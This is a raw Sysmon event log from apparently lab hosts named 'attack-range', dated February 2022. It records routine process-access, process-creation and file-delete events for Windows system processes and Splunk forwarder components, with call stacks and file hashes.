11:20:19.802{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1873-6216-4907-000000003802}6704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.802{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1873-6216-4907-000000003802}6704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.804{C8EA50B7-1873-6216-4907-000000003802}6704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.609{C8EA50B7-1873-6216-4807-000000003802}69046764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1873-6216-4807-000000003802}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1873-6216-4807-000000003802}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.189{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1873-6216-4807-000000003802}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.190{C8EA50B7-1873-6216-4807-000000003802}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:19.140{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7189186CF28ACC87DAACB7F5A43972D0,SHA256=4F8DE3C072C8F266D4B185CDFCF8AD3C71400C00B6E5D0591DA57AC1E911D4F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.726{C8EA50B7-1874-6216-4A07-000000003802}62166208C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1874-6216-4A07-000000003802}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1874-6216-4A07-000000003802}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.472{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1874-6216-4A07-000000003802}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.473{C8EA50B7-1874-6216-4A07-000000003802}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.155{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C152051E834E818B70AE5CC565C2DC,SHA256=1CAF4021FA8FFF24BA7DB17A3127312E7939624B57F77F68FADC4544553CF305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:20.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C83A93AE9AB07381378654EFB4E4D6B1,SHA256=8FD32F1D5DF31EA62B32C4EE4A5E5276C4165633B478AEA7D0F7DA1C8CADA741,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:20.071{C8EA50B7-1873-6216-4907-000000003802}67045448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:21.259{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89C5F9FB820852EA4BC491E6EF80481D,SHA256=27A67FA51658228B996312BF6CF1876D208536D837E7C8888E2F6EE8EBDD7E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC7BE5C04AC14C726E6E1DFD085D60F9,SHA256=1FB4EB6FD2E83C2BB4DC344513ECB8C87A28EB5003536195766115B90C5F1172,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:21.142{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1875-6216-4B07-000000003802}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 